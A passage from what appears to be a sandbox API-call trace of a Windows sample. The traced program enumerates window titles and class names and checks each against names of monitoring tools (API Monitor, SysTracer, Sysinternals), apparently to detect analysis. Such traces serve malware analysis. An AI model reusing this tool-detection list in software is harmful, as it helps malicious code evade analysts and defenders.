param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.743] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.743] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.743] strstr (_Str="Psychology Leaving Examinations", _SubStr="API Monitor") returned 0x0 [0158.743] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.743] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.743] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.743] strstr (_Str="Psychology Leaving Examinations", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.743] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.743] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.743] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.744] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.744] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.744] strstr (_Str="Psychology Leaving Examinations", _SubStr="sysinternals") returned 0x0 [0158.744] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.744] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.744] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.744] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.744] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="197132") returned 6 [0158.744] lstrcpyA (in: lpString1=0x430400, lpString2="197132" | out: lpString1="197132") returned="197132" [0158.744] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.744] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.744] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.744] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.744] GetWindowTextA (in: hWnd=0x3020c, lpString=0x340df8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0158.744] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.744] lstrcpynA (in: lpString1=0x3401e0, lpString2="DDE Server Window", iMaxLength=1024 | out: lpString1="DDE Server Window") returned="DDE Server Window" [0158.745] lstrcpyA (in: lpString1=0x430800, lpString2="DDE Server Window" | out: lpString1="DDE Server Window") returned="DDE Server Window" [0158.745] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="197132") returned 6 [0158.745] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.745] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.745] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.745] GetClassNameA (in: hWnd=0x3020c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0158.745] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.745] lstrcpynA (in: lpString1=0x341200, lpString2="OleDdeWndClass", iMaxLength=1024 | out: lpString1="OleDdeWndClass") returned="OleDdeWndClass" [0158.745] lstrcpyA (in: lpString1=0x430c00, lpString2="OleDdeWndClass" | out: lpString1="OleDdeWndClass") returned="OleDdeWndClass" [0158.745] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="197132") returned 6 [0158.745] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.745] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.745] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.745] strstr (_Str="DDE Server Window", _SubStr="- main thread") returned 0x0 [0158.745] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.745] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.746] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.746] strstr (_Str="DDE Server Window", _SubStr="API Monitor") returned 0x0 [0158.746] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.746] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.746] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.746] strstr (_Str="DDE Server Window", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.746] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.746] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.746] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.747] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.747] strstr (_Str="DDE Server Window", _SubStr="sysinternals") returned 0x0 [0158.747] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.747] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.747] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.747] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.747] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131590") returned 6 [0158.747] lstrcpyA (in: lpString1=0x430400, lpString2="131590" | out: lpString1="131590") returned="131590" [0158.747] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.747] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.747] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.747] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.747] GetWindowTextA (in: hWnd=0x20206, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.747] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.747] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.747] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.747] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131590") returned 6 [0158.748] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.748] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.748] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.748] GetClassNameA (in: hWnd=0x20206, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ComboLBox") returned 9 [0158.748] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.748] lstrcpynA (in: lpString1=0x341200, lpString2="ComboLBox", iMaxLength=1024 | out: lpString1="ComboLBox") returned="ComboLBox" [0158.748] lstrcpyA (in: lpString1=0x430c00, lpString2="ComboLBox" | out: lpString1="ComboLBox") returned="ComboLBox" [0158.748] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131590") returned 6 [0158.748] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.748] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.748] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.748] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.748] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.748] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.749] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.749] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.749] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.749] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.749] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.749] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.749] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.749] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.749] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.749] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.750] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.750] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.750] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.750] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.750] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="66012") returned 5 [0158.750] lstrcpyA (in: lpString1=0x430400, lpString2="66012" | out: lpString1="66012") returned="66012" [0158.750] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.750] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.750] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.750] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.750] GetWindowTextA (in: hWnd=0x101dc, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.750] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.750] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.750] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.750] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="66012") returned 5 [0158.750] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.750] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.751] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.751] GetClassNameA (in: hWnd=0x101dc, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="ComboLBox") returned 9 [0158.751] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.751] lstrcpynA (in: lpString1=0x341200, lpString2="ComboLBox", iMaxLength=1024 | out: lpString1="ComboLBox") returned="ComboLBox" [0158.751] lstrcpyA (in: lpString1=0x430c00, lpString2="ComboLBox" | out: lpString1="ComboLBox") returned="ComboLBox" [0158.751] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="66012") returned 5 [0158.751] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.751] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.751] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.751] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.751] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.751] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.751] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.752] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.752] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.752] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.752] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.752] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.752] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.752] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.752] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.752] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.753] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.753] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.753] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.753] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.753] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.753] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.753] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.753] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="197036") returned 6 [0158.753] lstrcpyA (in: lpString1=0x430400, lpString2="197036" | out: lpString1="197036") returned="197036" [0158.753] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.753] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.753] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.753] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.753] GetWindowTextA (in: hWnd=0x301ac, lpString=0x3401e0, nMaxCount=1024 | out: lpString="OfficePowerManagerWindow") returned 24 [0158.753] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.753] lstrcpynA (in: lpString1=0x340df8, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] lstrcpyA (in: lpString1=0x430800, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="197036") returned 6 [0158.754] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.754] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.754] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.754] GetClassNameA (in: hWnd=0x301ac, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0158.754] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.754] lstrcpynA (in: lpString1=0x341200, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] lstrcpyA (in: lpString1=0x430c00, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.754] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="197036") returned 6 [0158.754] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.754] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.754] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.754] strstr (_Str="OfficePowerManagerWindow", _SubStr="- main thread") returned 0x0 [0158.754] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.754] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.755] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.755] strstr (_Str="OfficePowerManagerWindow", _SubStr="API Monitor") returned 0x0 [0158.755] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.755] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.755] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.755] strstr (_Str="OfficePowerManagerWindow", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.755] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.755] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.755] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.755] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.756] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.756] strstr (_Str="OfficePowerManagerWindow", _SubStr="sysinternals") returned 0x0 [0158.756] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.756] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.756] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.756] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.756] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="328092") returned 6 [0158.756] lstrcpyA (in: lpString1=0x430400, lpString2="328092" | out: lpString1="328092") returned="328092" [0158.756] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.756] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.756] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.756] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.756] GetWindowTextA (in: hWnd=0x5019c, lpString=0x340df8, nMaxCount=1024 | out: lpString="Microsoft Office Sync Process") returned 29 [0158.756] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.756] lstrcpynA (in: lpString1=0x3401e0, lpString2="Microsoft Office Sync Process", iMaxLength=1024 | out: lpString1="Microsoft Office Sync Process") returned="Microsoft Office Sync Process" [0158.756] lstrcpyA (in: lpString1=0x430800, lpString2="Microsoft Office Sync Process" | out: lpString1="Microsoft Office Sync Process") returned="Microsoft Office Sync Process" [0158.757] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="328092") returned 6 [0158.757] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.757] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.758] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.758] GetClassNameA (in: hWnd=0x5019c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Microsoft.Office15.MsoSync") returned 26 [0158.758] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.758] lstrcpynA (in: lpString1=0x341200, lpString2="Microsoft.Office15.MsoSync", iMaxLength=1024 | out: lpString1="Microsoft.Office15.MsoSync") returned="Microsoft.Office15.MsoSync" [0158.758] lstrcpyA (in: lpString1=0x430c00, lpString2="Microsoft.Office15.MsoSync" | out: lpString1="Microsoft.Office15.MsoSync") returned="Microsoft.Office15.MsoSync" [0158.758] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="328092") returned 6 [0158.758] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.758] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.758] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.758] strstr (_Str="Microsoft Office Sync Process", _SubStr="- main thread") returned 0x0 [0158.758] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.758] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.758] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.759] strstr (_Str="Microsoft Office Sync Process", _SubStr="API Monitor") returned 0x0 [0158.759] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.759] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.759] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.759] strstr (_Str="Microsoft Office Sync Process", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.759] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.759] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.759] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.759] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.759] strstr (_Str="Microsoft Office Sync Process", _SubStr="sysinternals") returned 0x0 [0158.759] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.760] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.760] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.760] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.760] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65940") returned 5 [0158.760] lstrcpyA (in: lpString1=0x430400, lpString2="65940" | out: lpString1="65940") returned="65940" [0158.760] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.760] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.760] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.760] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.760] GetWindowTextA (in: hWnd=0x10194, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Say Convenience") returned 15 [0158.760] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.760] lstrcpynA (in: lpString1=0x340df8, lpString2="Say Convenience", iMaxLength=1024 | out: lpString1="Say Convenience") returned="Say Convenience" [0158.760] lstrcpyA (in: lpString1=0x430800, lpString2="Say Convenience" | out: lpString1="Say Convenience") returned="Say Convenience" [0158.760] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65940") returned 5 [0158.761] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.761] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.761] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.761] GetClassNameA (in: hWnd=0x10194, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Sayconvenienceapp") returned 17 [0158.761] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.761] lstrcpynA (in: lpString1=0x341200, lpString2="Sayconvenienceapp", iMaxLength=1024 | out: lpString1="Sayconvenienceapp") returned="Sayconvenienceapp" [0158.761] lstrcpyA (in: lpString1=0x430c00, lpString2="Sayconvenienceapp" | out: lpString1="Sayconvenienceapp") returned="Sayconvenienceapp" [0158.761] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65940") returned 5 [0158.761] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.761] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.761] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.761] strstr (_Str="Say Convenience", _SubStr="- main thread") returned 0x0 [0158.761] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.761] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.761] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.762] strstr (_Str="Say Convenience", _SubStr="API Monitor") returned 0x0 [0158.762] wsprintfA (in: param_1=0x341200, param_2="%d" | 